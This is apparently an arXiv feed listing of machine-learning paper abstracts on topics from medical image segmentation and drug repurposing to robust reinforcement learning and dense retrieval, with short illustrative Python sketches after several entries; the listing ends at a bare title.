Convolutional Neural Networks (CNNs) have made significant strides in medical image analysis in recent years. However, the local nature of the convolution operator may pose a limitation for capturing global and long-range interactions in CNNs. Recently, Transformers have gained popularity in the computer vision community and in medical image segmentation due to their ability to process global features effectively. However, the scalability issues of the self-attention mechanism and the lack of a CNN-like inductive bias may have limited their adoption. Therefore, hybrid Vision Transformers (CNN-Transformer), exploiting the advantages of both convolution and self-attention mechanisms, have gained importance. In this work, we present MaxViT-UNet, an Encoder-Decoder based hybrid vision transformer (CNN-Transformer) for medical image segmentation. The proposed Hybrid Decoder, based on the MaxViT-block, is designed to harness the power of both the convolution and self-attention mechanisms at each decoding stage with nominal computational burden. The inclusion of multi-axis self-attention within each decoder stage significantly enhances the discriminating capacity between the object and background regions, and thereby helps in improving the segmentation efficiency. In the Hybrid Decoder block, the fusion process commences by integrating the upsampled lower-level decoder features, obtained through transpose convolution, with the skip-connection features derived from the hybrid encoder. Subsequently, the fused features undergo refinement through the utilization of a multi-axis attention mechanism. The proposed decoder block is repeated multiple times to progressively segment the nuclei regions. Experimental results on the MoNuSeg18 and MoNuSAC20 datasets demonstrate the effectiveness of the proposed technique.  ( 3 min )
    How to choose the most appropriate centrality measure? A decision tree approach. (arXiv:2003.01052v5 [physics.soc-ph] UPDATED)
    Centrality metrics are vital for network analysis, but selecting the most appropriate measures for specific applications remains challenging among the 400+ proposed indices. Existing approaches -- model-based, data-driven, and axiomatic -- have limitations. To address this, we introduce the culling method, leveraging expert preferences regarding centrality behavior on simple graphs. It involves forming a set of candidate measures, generating a list of as small graphs as possible needed to ``separate'' measures from each other, constructing a decision-tree survey, and identifying the measure consistent with expert responses. We apply this method to a diverse set of 40 centralities, including new kernel-based measures, and combine it with the axiomatic approach. Remarkably, only 13 small 1-trees suffice to separate all 40 measures, among which there are pairs of close ones. The culling method offers a low-cost solution in terms of labor and time, complements existing methods for measure selection, and reveals important peculiarities of centrality measures.  ( 2 min )
    Drug Repurposing Targeting COVID-19 3CL Protease using Molecular Docking and Machine Learning Regression Approach. (arXiv:2305.18088v4 [q-bio.BM] UPDATED)
The COVID-19 pandemic has created a global health crisis, driving the need for the rapid identification of potential therapeutics. To meet this challenge, drug repurposing is the only solution that saves cost, time, and labor. In this study, we used the ZINC database to screen 5903 world-approved (including FDA-approved) drugs for repurposing as potential COVID-19 treatments targeting the main protease 3CL of SARS-CoV-2. We performed molecular docking and checked the efficacy of the drug molecules. To enhance the efficiency of the drug repurposing approach, we modeled the binding affinities using several machine learning regression approaches for QSAR modeling, such as decision tree, extra trees, MLP, KNN, XGBoost, and gradient boosting. The computational results demonstrated that the Decision Tree Regression (DTR) model has improved statistical measures of R2 and RMSE. These simulated results helped to identify drugs with high binding affinity. From the docking and other statistical analysis, we shortlisted six promising drugs with their respective Zinc IDs (ZINC3873365, ZINC85432544, ZINC203757351, ZINC85536956, ZINC8214470 and ZINC261494640) within the range of -15 kcal/mol to -13 kcal/mol. The repurposed drugs are novel except for the antiviral compound ZINC203757351, which has already been identified against COVID-19 in other studies. Further, we analyzed the physiochemical and pharmacokinetic properties of these top-ranked drugs with respect to their best binding interactions with the specific target protease 3CLpro. Our study provides an efficient framework for drug repurposing against COVID-19, highlighting the potential of combining molecular docking with machine learning regression approaches to accelerate the identification of potential therapeutic candidates.  ( 3 min )
    Correcting Underrepresentation and Intersectional Bias for Fair Classification. (arXiv:2306.11112v2 [cs.LG] UPDATED)
    We consider the problem of learning from data corrupted by underrepresentation bias, where positive examples are filtered from the data at different, unknown rates for a fixed number of sensitive groups. We show that with a small amount of unbiased data, we can efficiently estimate the group-wise drop-out parameters, even in settings where intersectional group membership makes learning each intersectional rate computationally infeasible. Using this estimate for the group-wise drop-out rate, we construct a re-weighting scheme that allows us to approximate the loss of any hypothesis on the true distribution, even if we only observe the empirical error on a biased sample. Finally, we present an algorithm encapsulating this learning and re-weighting process, and we provide strong PAC-style guarantees that, with high probability, our estimate of the risk of the hypothesis over the true distribution will be arbitrarily close to the true risk.  ( 2 min )
    Efficient Beam Tree Recursion. (arXiv:2307.10779v1 [cs.LG])
    Beam Tree Recursive Neural Network (BT-RvNN) was recently proposed as a simple extension of Gumbel Tree RvNN and it was shown to achieve state-of-the-art length generalization performance in ListOps while maintaining comparable performance on other tasks. However, although not the worst in its kind, BT-RvNN can be still exorbitantly expensive in memory usage. In this paper, we identify the main bottleneck in BT-RvNN's memory usage to be the entanglement of the scorer function and the recursive cell function. We propose strategies to remove this bottleneck and further simplify its memory usage. Overall, our strategies not only reduce the memory usage of BT-RvNN by $10$-$16$ times but also create a new state-of-the-art in ListOps while maintaining similar performance in other tasks. In addition, we also propose a strategy to utilize the induced latent-tree node representations produced by BT-RvNN to turn BT-RvNN from a sentence encoder of the form $f:\mathbb{R}^{n \times d} \rightarrow \mathbb{R}^{d}$ into a sequence contextualizer of the form $f:\mathbb{R}^{n \times d} \rightarrow \mathbb{R}^{n \times d}$. Thus, our proposals not only open up a path for further scalability of RvNNs but also standardize a way to use BT-RvNNs as another building block in the deep learning toolkit that can be easily stacked or interfaced with other popular models such as Transformers and Structured State Space models.  ( 2 min )
    Sequential Predictive Two-Sample and Independence Testing. (arXiv:2305.00143v2 [stat.ML] UPDATED)
    We study the problems of sequential nonparametric two-sample and independence testing. Sequential tests process data online and allow using observed data to decide whether to stop and reject the null hypothesis or to collect more data, while maintaining type I error control. We build upon the principle of (nonparametric) testing by betting, where a gambler places bets on future observations and their wealth measures evidence against the null hypothesis. While recently developed kernel-based betting strategies often work well on simple distributions, selecting a suitable kernel for high-dimensional or structured data, such as images, is often nontrivial. To address this drawback, we design prediction-based betting strategies that rely on the following fact: if a sequentially updated predictor starts to consistently determine (a) which distribution an instance is drawn from, or (b) whether an instance is drawn from the joint distribution or the product of the marginal distributions (the latter produced by external randomization), it provides evidence against the two-sample or independence nulls respectively. We empirically demonstrate the superiority of our tests over kernel-based approaches under structured settings. Our tests can be applied beyond the case of independent and identically distributed data, remaining valid and powerful even when the data distribution drifts over time.  ( 2 min )
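The betting principle the abstract builds on can be stated in a few lines: the gambler's wealth is a running product of per-round payoffs, it remains a nonnegative martingale under the null, and large wealth is evidence against the null (reject when it exceeds 1/alpha, which controls the type I error by Ville's inequality). A minimal sketch with hypothetical bounded outcomes and bet fractions:

```python
def betting_wealth(outcomes, bets, alpha=0.05):
    # outcomes in [-1, 1] (e.g. a payoff derived from a predictor's guess
    # about which sample an instance came from), bets in [-1, 1] (fraction
    # of current wealth staked each round).
    wealth = 1.0
    for o, b in zip(outcomes, bets):
        wealth *= 1.0 + b * o  # bounded payoff keeps wealth nonnegative
    return wealth, wealth > 1.0 / alpha  # reject the null if wealth is large

# Consistently correct predictions grow wealth exponentially -> rejection.
w, reject = betting_wealth([1.0] * 80, [0.5] * 80)
print(w, reject)
```

The prediction-based strategies in the paper plug a sequentially trained classifier into the choice of `bets`, which is what lets them handle structured data where picking a kernel is hard.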
    On Combining Expert Demonstrations in Imitation Learning via Optimal Transport. (arXiv:2307.10810v1 [cs.LG])
Imitation learning (IL) seeks to teach agents specific tasks through expert demonstrations. One of the key approaches to IL is to define a distance between agent and expert and to find an agent policy that minimizes that distance. Optimal transport methods have been widely used in imitation learning as they provide ways to measure meaningful distances between agent and expert trajectories. However, the problem of how to optimally combine multiple expert demonstrations has not been widely studied. The standard method is to simply concatenate state (-action) trajectories, which is problematic when trajectories are multi-modal. We propose an alternative method that uses a multi-marginal optimal transport distance and enables the combination of multiple and diverse state-trajectories in the OT sense, providing a more sensible geometric average of the demonstrations. Our approach enables an agent to learn from several experts, and its efficiency is analyzed on OpenAI Gym control environments, demonstrating that the standard method is not always optimal.  ( 2 min )
    It Is All About Data: A Survey on the Effects of Data on Adversarial Robustness. (arXiv:2303.09767v2 [cs.LG] UPDATED)
    Adversarial examples are inputs to machine learning models that an attacker has intentionally designed to confuse the model into making a mistake. Such examples pose a serious threat to the applicability of machine-learning-based systems, especially in life- and safety-critical domains. To address this problem, the area of adversarial robustness investigates mechanisms behind adversarial attacks and defenses against these attacks. This survey reviews a particular subset of this literature that focuses on investigating properties of training data in the context of model robustness under evasion attacks. It first summarizes the main properties of data leading to adversarial vulnerability. It then discusses guidelines and techniques for improving adversarial robustness by enhancing the data representation and learning procedures, as well as techniques for estimating robustness guarantees given particular data. Finally, it discusses gaps of knowledge and promising future research directions in this area.  ( 2 min )
    Syntactic vs Semantic Linear Abstraction and Refinement of Neural Networks. (arXiv:2307.10891v1 [cs.LO])
    Abstraction is a key verification technique to improve scalability. However, its use for neural networks is so far extremely limited. Previous approaches for abstracting classification networks replace several neurons with one of them that is similar enough. We can classify the similarity as defined either syntactically (using quantities on the connections between neurons) or semantically (on the activation values of neurons for various inputs). Unfortunately, the previous approaches only achieve moderate reductions, when implemented at all. In this work, we provide a more flexible framework where a neuron can be replaced with a linear combination of other neurons, improving the reduction. We apply this approach both on syntactic and semantic abstractions, and implement and evaluate them experimentally. Further, we introduce a refinement method for our abstractions, allowing for finding a better balance between reduction and precision.  ( 2 min )
    Pythae: Unifying Generative Autoencoders in Python -- A Benchmarking Use Case. (arXiv:2206.08309v2 [cs.LG] UPDATED)
    In recent years, deep generative models have attracted increasing interest due to their capacity to model complex distributions. Among those models, variational autoencoders have gained popularity as they have proven both to be computationally efficient and yield impressive results in multiple fields. Following this breakthrough, extensive research has been done in order to improve the original publication, resulting in a variety of different VAE models in response to different tasks. In this paper we present Pythae, a versatile open-source Python library providing both a unified implementation and a dedicated framework allowing straightforward, reproducible and reliable use of generative autoencoder models. We then propose to use this library to perform a case study benchmark where we present and compare 19 generative autoencoder models representative of some of the main improvements on downstream tasks such as image reconstruction, generation, classification, clustering and interpolation. The open-source library can be found at https://github.com/clementchadebec/benchmark_VAE.  ( 2 min )
    SAFARI: Versatile and Efficient Evaluations for Robustness of Interpretability. (arXiv:2208.09418v3 [cs.LG] UPDATED)
    Interpretability of Deep Learning (DL) is a barrier to trustworthy AI. Despite great efforts made by the Explainable AI (XAI) community, explanations lack robustness -- indistinguishable input perturbations may lead to different XAI results. Thus, it is vital to assess how robust DL interpretability is, given an XAI method. In this paper, we identify several challenges that the state-of-the-art is unable to cope with collectively: i) existing metrics are not comprehensive; ii) XAI techniques are highly heterogeneous; iii) misinterpretations are normally rare events. To tackle these challenges, we introduce two black-box evaluation methods, concerning the worst-case interpretation discrepancy and a probabilistic notion of how robust in general, respectively. Genetic Algorithm (GA) with bespoke fitness function is used to solve constrained optimisation for efficient worst-case evaluation. Subset Simulation (SS), dedicated to estimate rare event probabilities, is used for evaluating overall robustness. Experiments show that the accuracy, sensitivity, and efficiency of our methods outperform the state-of-the-arts. Finally, we demonstrate two applications of our methods: ranking robust XAI methods and selecting training schemes to improve both classification and interpretation robustness.  ( 2 min )
    Variational Mixture of HyperGenerators for Learning Distributions Over Functions. (arXiv:2302.06223v3 [cs.LG] UPDATED)
    Recent approaches build on implicit neural representations (INRs) to propose generative models over function spaces. However, they are computationally costly when dealing with inference tasks, such as missing data imputation, or cannot tackle them at all. In this work, we propose a novel deep generative model, named VAMoH. VAMoH combines the capability of modeling continuous functions using INRs with the inference capabilities of Variational Autoencoders (VAEs). In addition, VAMoH relies on a normalizing flow to define the prior, and a mixture of hypernetworks to parametrize the data log-likelihood. This gives VAMoH high expressive capability and interpretability. Through experiments on a diverse range of data types, such as images, voxels, and climate data, we show that VAMoH can effectively learn rich distributions over continuous functions. Furthermore, it can perform inference-related tasks, such as conditional super-resolution generation and in-painting, as well as or better than previous approaches, while being less computationally demanding.  ( 2 min )
    Efficient Action Robust Reinforcement Learning with Probabilistic Policy Execution Uncertainty. (arXiv:2307.07666v2 [cs.LG] UPDATED)
    Robust reinforcement learning (RL) aims to find a policy that optimizes the worst-case performance in the face of uncertainties. In this paper, we focus on action robust RL with probabilistic policy execution uncertainty, in which, instead of always carrying out the action specified by the policy, the agent takes the action specified by the policy with probability $1-\rho$ and an alternative adversarial action with probability $\rho$. We establish the existence of an optimal policy for action robust MDPs with probabilistic policy execution uncertainty and provide the action robust Bellman optimality equation for its solution. Furthermore, we develop the Action Robust Reinforcement Learning with Certificates (ARRLC) algorithm, which achieves minimax optimal regret and sample complexity. Finally, we conduct numerical experiments to validate our approach's robustness, demonstrating that ARRLC outperforms non-robust RL algorithms and converges faster than the robust TD algorithm in the presence of action perturbations.  ( 2 min )
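The execution-uncertainty model described above admits a compact tabular illustration: the value of choosing an action mixes its own return (probability 1-rho) with the adversary's worst substitute (probability rho). The following is a minimal sketch of one such robust Bellman backup; it illustrates the setting only and is not the paper's ARRLC algorithm.

```python
import numpy as np

def action_robust_backup(P, R, V, rho, gamma=0.9):
    """One Bellman backup under probabilistic policy execution uncertainty:
    the chosen action is executed with probability 1-rho, and with
    probability rho an adversary substitutes the worst action.
    Tabular sketch of the setting, not the ARRLC algorithm itself."""
    Q = R + gamma * np.einsum('san,n->sa', P, V)    # plain action values
    worst = Q.min(axis=1, keepdims=True)            # adversary's pick per state
    Q_robust = (1 - rho) * Q + rho * worst          # robust value of choosing a
    return Q_robust.max(axis=1), Q_robust.argmax(axis=1)

# Tiny 2-state, 2-action MDP: P[s, a, s'] are transition probabilities
P = np.zeros((2, 2, 2))
P[:, :, 0] = 1.0                                    # every action leads to state 0
R = np.array([[1.0, 0.0], [0.5, 0.2]])
V_new, pi = action_robust_backup(P, R, np.zeros(2), rho=0.1)
print(V_new)   # [0.9, 0.47]: each value discounted toward the worst action
```

With rho = 0 this reduces to the standard Bellman backup; increasing rho pulls every value toward the adversary's choice.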
    Spatial-Temporal Data Mining for Ocean Science: Data, Methodologies, and Opportunities. (arXiv:2307.10803v1 [cs.LG])
    With the increasing amount of spatial-temporal~(ST) ocean data, numerous spatial-temporal data mining (STDM) studies have been conducted to address various oceanic issues, e.g., climate forecasting and disaster warning. Compared with typical ST data (e.g., traffic data), ST ocean data is more complicated with some unique characteristics, e.g., diverse regionality and high sparsity. These characteristics make it difficult to design and train STDM models. Unfortunately, an overview of these studies is still missing, hindering computer scientists to identify the research issues in ocean while discouraging researchers in ocean science from applying advanced STDM techniques. To remedy this situation, we provide a comprehensive survey to summarize existing STDM studies in ocean. Concretely, we first summarize the widely-used ST ocean datasets and identify their unique characteristics. Then, typical ST ocean data quality enhancement techniques are discussed. Next, we classify existing STDM studies for ocean into four types of tasks, i.e., prediction, event detection, pattern mining, and anomaly detection, and elaborate the techniques for these tasks. Finally, promising research opportunities are highlighted. This survey will help scientists from the fields of both computer science and ocean science have a better understanding of the fundamental concepts, key techniques, and open challenges of STDM in ocean.  ( 3 min )
    Topological Point Cloud Clustering. (arXiv:2303.16716v2 [math.AT] UPDATED)
    We present Topological Point Cloud Clustering (TPCC), a new method to cluster points in an arbitrary point cloud based on their contribution to global topological features. TPCC synthesizes desirable features from spectral clustering and topological data analysis and is based on the spectral properties of a simplicial complex associated with the point cloud. As it relies on sparse eigenvector computations, TPCC is as easy to interpret and implement as spectral clustering. However, by focusing not just on a single matrix associated with a graph created from the point cloud data, but on a whole set of Hodge Laplacians associated with an appropriately constructed simplicial complex, we can leverage a far richer set of topological features to characterize the data points within the point cloud and benefit from the relative robustness of topological techniques against noise. We test the performance of TPCC on both synthetic and real-world data and compare it with classical spectral clustering.  ( 2 min )
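The classical spectral-clustering step that TPCC generalizes is eigendecomposition of the graph Laplacian L = D - A; TPCC replaces this single matrix with a set of Hodge Laplacians of a simplicial complex. The graph case can be sketched as follows (the simplicial generalization is omitted):

```python
import numpy as np

def laplacian_spectrum(A):
    """Eigenpairs of the graph Laplacian L = D - A -- the single-matrix
    computation that TPCC extends to a whole set of Hodge Laplacians.
    Small eigenvalues/eigenvectors reveal connected components/clusters."""
    L = np.diag(A.sum(axis=1)) - A
    return np.linalg.eigh(L)        # ascending eigenvalues, orthonormal vectors

# Two disconnected triangles: one zero Laplacian eigenvalue per component
A = np.zeros((6, 6))
for i, j in [(0, 1), (0, 2), (1, 2), (3, 4), (3, 5), (4, 5)]:
    A[i, j] = A[j, i] = 1.0
vals, vecs = laplacian_spectrum(A)
print(int(np.sum(vals < 1e-8)))   # 2 near-zero eigenvalues -> 2 clusters
```

The corresponding eigenvectors would then be fed to a standard clustering routine such as k-means.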
    Deep-Q Learning with Hybrid Quantum Neural Network on Solving Maze Problems. (arXiv:2304.10159v2 [quant-ph] UPDATED)
    Quantum computing holds great potential for pushing past the limitations of machine learning algorithms, enabling them to handle higher data dimensions and reducing the overall number of training parameters in deep neural network (DNN) models. This study uses a parameterized quantum circuit (PQC) on a gate-based quantum computer to investigate the potential for quantum advantage in a model-free reinforcement learning problem. Through a comprehensive investigation and evaluation of the current models and capabilities of quantum computers, we designed and trained a novel hybrid quantum neural network based on the latest Qiskit and PyTorch frameworks. We compared its performance with a fully classical DNN with and without an integrated PQC. Our research provides insights into the potential of deep quantum learning to solve a maze problem and, potentially, other reinforcement learning problems. We conclude that various reinforcement learning problems can be solved effectively within a reasonable number of training epochs. Moreover, we provide a comparative discussion of various quantum reinforcement learning models on maze problems to evaluate our research's overall potential and advantages.  ( 2 min )
    Quantitative CLTs in Deep Neural Networks. (arXiv:2307.06092v2 [cs.LG] UPDATED)
    We study the distribution of a fully connected neural network with random Gaussian weights and biases in which the hidden layer widths are proportional to a large constant $n$. Under mild assumptions on the non-linearity, we obtain quantitative bounds on normal approximations valid at large but finite $n$ and any fixed network depth. Our theorems show both for the finite-dimensional distributions and the entire process, that the distance between a random fully connected network (and its derivatives) to the corresponding infinite width Gaussian process scales like $n^{-\gamma}$ for $\gamma>0$, with the exponent depending on the metric used to measure discrepancy. Our bounds are strictly stronger in terms of their dependence on network width than any previously available in the literature; in the one-dimensional case, we also prove that they are optimal, i.e., we establish matching lower bounds.
    When are Local Queries Useful for Robust Learning?. (arXiv:2210.06089v2 [cs.LG] UPDATED)
    Distributional assumptions have been shown to be necessary for the robust learnability of concept classes when considering the exact-in-the-ball robust risk and access to random examples by Gourdeau et al. (2019). In this paper, we study learning models where the learner is given more power through the use of local queries, and give the first distribution-free algorithms that perform robust empirical risk minimization (ERM) for this notion of robustness. The first learning model we consider uses local membership queries (LMQ), where the learner can query the label of points near the training sample. We show that, under the uniform distribution, LMQs do not increase the robustness threshold of conjunctions and any superclass, e.g., decision lists and halfspaces. Faced with this negative result, we introduce the local equivalence query ($\mathsf{LEQ}$) oracle, which returns whether the hypothesis and target concept agree in the perturbation region around a point in the training sample, as well as a counterexample if it exists. We show a separation result: on the one hand, if the query radius $\lambda$ is strictly smaller than the adversary's perturbation budget $\rho$, then distribution-free robust learning is impossible for a wide variety of concept classes; on the other hand, the setting $\lambda=\rho$ allows us to develop robust ERM algorithms. We then bound the query complexity of these algorithms based on online learning guarantees and further improve these bounds for the special case of conjunctions. We finish by giving robust learning algorithms for halfspaces on $\{0,1\}^n$ and then obtaining robustness guarantees for halfspaces in $\mathbb{R}^n$ against precision-bounded adversaries.
    Perceptron Theory Can Predict the Accuracy of Neural Networks. (arXiv:2012.07881v2 [cs.LG] UPDATED)
    Multilayer neural networks set the current state of the art for many technical classification problems. But these networks are still, essentially, black boxes in terms of analyzing them and predicting their performance. Here, we develop a statistical theory for the one-layer perceptron and show that it can predict the performance of a surprisingly large variety of neural networks with different architectures. A general theory of classification with perceptrons is developed by generalizing an existing theory for analyzing reservoir computing models and connectionist models for symbolic reasoning known as vector symbolic architectures. Our statistical theory offers three formulas leveraging the signal statistics with increasing detail. The formulas are analytically intractable, but can be evaluated numerically. The description level that captures maximum detail requires stochastic sampling methods. Depending on the network model, the simpler formulas already yield high prediction accuracy. The quality of the theory's predictions is assessed in three experimental settings: a memorization task for echo state networks (ESNs) from the reservoir computing literature, a collection of classification datasets for shallow randomly connected networks, and the ImageNet dataset for deep convolutional neural networks. We find that the second description level of the perceptron theory can predict the performance of types of ESNs that could not be described previously. The theory can predict the performance of deep multilayer neural networks when applied to their output layer. While other methods for predicting neural network performance commonly require training an estimator model, the proposed theory requires only the first two moments of the distribution of the postsynaptic sums in the output neurons. The perceptron theory compares favorably to other methods that do not rely on training an estimator model.  ( 3 min )
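The core idea that only the first two moments of the postsynaptic sums are needed can be shown with a deliberately simplified two-class version: if the correct and competing output sums are approximately Gaussian and independent, the win probability is a normal CDF of the standardized mean gap. This is a toy sketch of the moment-based idea, not the paper's actual formulas.

```python
import math

def predicted_accuracy(mu_c, var_c, mu_o, var_o):
    """Toy two-class moment-based prediction: if the postsynaptic sums of
    the correct unit (mu_c, var_c) and competing unit (mu_o, var_o) are
    Gaussian and independent, the correct unit wins with probability
    Phi((mu_c - mu_o) / sqrt(var_c + var_o)). Simplified sketch only."""
    z = (mu_c - mu_o) / math.sqrt(var_c + var_o)
    return 0.5 * (1.0 + math.erf(z / math.sqrt(2.0)))

acc = predicted_accuracy(mu_c=1.0, var_c=1.0, mu_o=0.0, var_o=1.0)
print(round(acc, 4))   # Phi(1/sqrt(2)) ≈ 0.7602
```

Note that only means and variances enter the formula; no estimator model is trained.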
    Data-Driven Latency Probability Prediction for Wireless Networks: Focusing on Tail Probabilities. (arXiv:2307.10648v1 [cs.NI])
    With the emergence of new application areas, such as cyber-physical systems and human-in-the-loop applications, there is a need to guarantee a certain level of end-to-end network latency with extremely high reliability, e.g., 99.999%. While mechanisms specified under IEEE 802.1AS time-sensitive networking (TSN) can be used to achieve these requirements for switched Ethernet networks, implementing TSN mechanisms in wireless networks is challenging due to their stochastic nature. To conform the wireless link to a reliability level of 99.999%, the behavior of extremely rare outliers in the latency probability distribution, or the tail of the distribution, must be analyzed and controlled. This work proposes predicting the tail of the latency distribution using state-of-the-art data-driven approaches, such as mixture density networks (MDN) and extreme value mixture models, to estimate the likelihood of rare latencies conditioned on the network parameters, which can be used to make more informed decisions in wireless transmission. Actual latency measurements from IEEE 802.11g (WiFi), a commercial private 5G network, and a software-defined 5G network are used to benchmark the proposed approaches and evaluate their sensitivity with respect to the tail probabilities.
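To see why tail-aware models are needed at all, consider the naive baseline: counting exceedances in a latency trace. At the 99.999% level this estimator needs millions of samples to see even a handful of events, which is the gap MDNs and extreme value mixture models address. A minimal sketch on synthetic data:

```python
import random

def tail_probability(samples, threshold):
    """Naive empirical estimate of P(latency > threshold). At five-nines
    reliability this counting estimator is hopelessly sample-hungry --
    exactly the motivation for the paper's MDN / extreme-value approaches."""
    return sum(s > threshold for s in samples) / len(samples)

random.seed(0)
# Synthetic latencies (exponential is an assumption, not the paper's data)
latencies = [random.expovariate(1.0) for _ in range(100_000)]
p = tail_probability(latencies, 5.0)
print(p)   # close to exp(-5) ≈ 0.0067 for this synthetic distribution
```

A parametric tail model, fitted to exceedances above a high threshold, can extrapolate to quantiles the empirical estimator cannot resolve.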
    Injecting Domain Adaptation with Learning-to-hash for Effective and Efficient Zero-shot Dense Retrieval. (arXiv:2205.11498v2 [cs.IR] UPDATED)
    Dense retrieval overcomes the lexical gap and has shown great success in ad-hoc information retrieval (IR). Despite their success, dense retrievers are expensive to serve across practical use cases. For use cases that require searching over millions of documents, the dense index becomes bulky and requires high memory usage for storing the index. More recently, learning-to-hash (LTH) techniques, e.g., BPR and JPQ, produce binary document vectors, thereby reducing the memory required to efficiently store the dense index. LTH techniques are supervised and fine-tune the retriever using a ranking loss. They outperform their counterparts, i.e., traditional out-of-the-box vector compression techniques such as PCA or PQ. A missing piece from prior work is that existing techniques have been evaluated only in-domain, i.e., on a single dataset such as MS MARCO. In our work, we evaluate LTH and vector compression techniques for improving the downstream zero-shot retrieval accuracy of the TAS-B dense retriever while maintaining efficiency at inference. Our results demonstrate that, unlike prior work, LTH strategies when applied naively can underperform the zero-shot TAS-B dense retriever on average by up to 14% nDCG@10 on the BEIR benchmark. To solve this limitation, we propose an easy yet effective solution of injecting domain adaptation with existing supervised LTH techniques. We experiment with two well-known unsupervised domain adaptation techniques: GenQ and GPL. Our domain adaptation injection technique can improve the downstream zero-shot retrieval effectiveness for both BPR and JPQ variants of the TAS-B model by on average 11.5% and 8.2% nDCG@10 respectively, while maintaining 32$\times$ memory efficiency and 14$\times$ and 2$\times$ speedups in CPU retrieval latency on BEIR. All our code, models, and data are publicly available at https://github.com/thakur-nandan/income.
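The memory saving behind learning-to-hash comes from replacing float vectors with bit vectors compared by Hamming distance. BPR and JPQ learn this binarization; the sketch below only thresholds at zero as an untrained stand-in, to make the mechanics concrete.

```python
import numpy as np

def binarize(X):
    """Sign-binarize dense vectors into {0,1} bits -- the memory-saving idea
    behind learning-to-hash. (BPR/JPQ *learn* the hashing with a ranking
    loss; thresholding at zero here is only an untrained stand-in.)"""
    return (np.asarray(X) > 0).astype(np.uint8)

def hamming_search(query_bits, doc_bits, k=2):
    """Rank documents by Hamming distance of their bit vectors to the query."""
    dists = (query_bits[None, :] != doc_bits).sum(axis=1)
    return np.argsort(dists, kind="stable")[:k]

docs = np.array([[ 1, -1,  1, -1,  1, -1,  1, -1],
                 [-1,  1, -1,  1, -1,  1, -1,  1],
                 [ 1,  1,  1,  1, -1, -1, -1, -1],
                 [ 1,  1, -1, -1,  1,  1, -1, -1]], dtype=float)
query = np.array([1.0, 1.0, -1.0, -1.0, 1.0, 1.0, -1.0, 0.5])  # nearest to doc 3
top = hamming_search(binarize(query), binarize(docs))
print(int(top[0]))   # doc 3 ranks first
```

Each 8-dimensional float vector (32 bytes as float32) collapses to a single byte of bits, which is where the 32x memory figure for real embeddings comes from.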
    Positive unlabeled learning with tensor networks. (arXiv:2211.14085v3 [cs.LG] UPDATED)
    Positive unlabeled learning is a binary classification problem with positive and unlabeled data. It is common in domains where negative labels are costly or impossible to obtain, e.g., medicine and personalized advertising. Most approaches to positive unlabeled learning apply to specific data types (e.g., images, categorical data) and cannot generate new positive and negative samples. This work introduces a feature-space distance-based tensor network approach to the positive unlabeled learning problem. The presented method is not domain-specific and significantly improves the state-of-the-art results on the MNIST image and 15 categorical/mixed datasets. The trained tensor network model is also a generative model and enables the generation of new positive and negative instances.
    Chordal Averaging on Flag Manifolds and Its Applications. (arXiv:2303.13501v2 [cs.CV] UPDATED)
    This paper presents a new, provably-convergent algorithm for computing the flag-mean and flag-median of a set of points on a flag manifold under the chordal metric. The flag manifold is a mathematical space consisting of flags, which are sequences of nested subspaces of a vector space that increase in dimension. The flag manifold is a superset of a wide range of known matrix spaces, including Stiefel manifolds and Grassmannians, making it a general object that is useful in a wide variety of computer vision problems. To tackle the challenge of computing first-order flag statistics, we first transform the problem into one that involves auxiliary variables constrained to the Stiefel manifold. The Stiefel manifold is a space of orthogonal frames, and leveraging the numerical stability and efficiency of Stiefel-manifold optimization enables us to compute the flag-mean effectively. Through a series of experiments, we show the competence of our method in Grassmann and rotation averaging, as well as principal component analysis. We release our source code at https://github.com/nmank/FlagAveraging.  ( 2 min )
    A Survey of What to Share in Federated Learning: Perspectives on Model Utility, Privacy Leakage, and Communication Efficiency. (arXiv:2307.10655v1 [cs.LG])
    Federated learning (FL) has emerged as a highly effective paradigm for privacy-preserving collaborative training among different parties. Unlike traditional centralized learning, which requires collecting data from each party, FL allows clients to share privacy-preserving information without exposing private datasets. This approach not only guarantees enhanced privacy protection but also facilitates more efficient and secure collaboration among multiple participants. Therefore, FL has gained considerable attention from researchers, prompting numerous surveys to summarize the related works. However, the majority of these surveys concentrate on methods that share model parameters during the training process, while overlooking the potential of sharing other forms of local information. In this paper, we present a systematic survey from a new perspective, i.e., what to share in FL, with an emphasis on model utility, privacy leakage, and communication efficiency. This survey differs from previous ones due to four distinct contributions. First, we present a new taxonomy of FL methods in terms of the sharing methods, which includes three categories of shared information: model sharing, synthetic data sharing, and knowledge sharing. Second, we analyze the vulnerability of different sharing methods to privacy attacks and review the defense mechanisms that provide certain privacy guarantees. Third, we conduct extensive experiments to compare the performance and communication overhead of various sharing methods in FL. In addition, we assess the potential privacy leakage through model inversion and membership inference attacks, while comparing the effectiveness of various defense approaches. Finally, we discuss potential deficiencies in current methods and outline future directions for improvement.
    Curiosity in Hindsight: Intrinsic Exploration in Stochastic Environments. (arXiv:2211.10515v2 [stat.ML] UPDATED)
    Consider the problem of exploration in sparse-reward or reward-free environments, such as in Montezuma's Revenge. In the curiosity-driven paradigm, the agent is rewarded for how much each realized outcome differs from its predicted outcome. But using predictive error as intrinsic motivation is fragile in stochastic environments, as the agent may become trapped by high-entropy areas of the state-action space, such as a "noisy TV". In this work, we study a natural solution derived from structural causal models of the world: Our key idea is to learn representations of the future that capture precisely the unpredictable aspects of each outcome -- which we use as additional input for predictions, such that intrinsic rewards only reflect the predictable aspects of world dynamics. First, we propose incorporating such hindsight representations into models to disentangle "noise" from "novelty", yielding Curiosity in Hindsight: a simple and scalable generalization of curiosity that is robust to stochasticity. Second, we instantiate this framework for the recently introduced BYOL-Explore algorithm as our prime example, resulting in the noise-robust BYOL-Hindsight. Third, we illustrate its behavior under a variety of different stochasticities in a grid world, and find improvements over BYOL-Explore in hard-exploration Atari games with sticky actions. Notably, we show state-of-the-art results in exploring Montezuma's Revenge with sticky actions, while preserving performance in the non-sticky setting.
    Intelligent model for offshore China sea fog forecasting. (arXiv:2307.10580v1 [cs.LG])
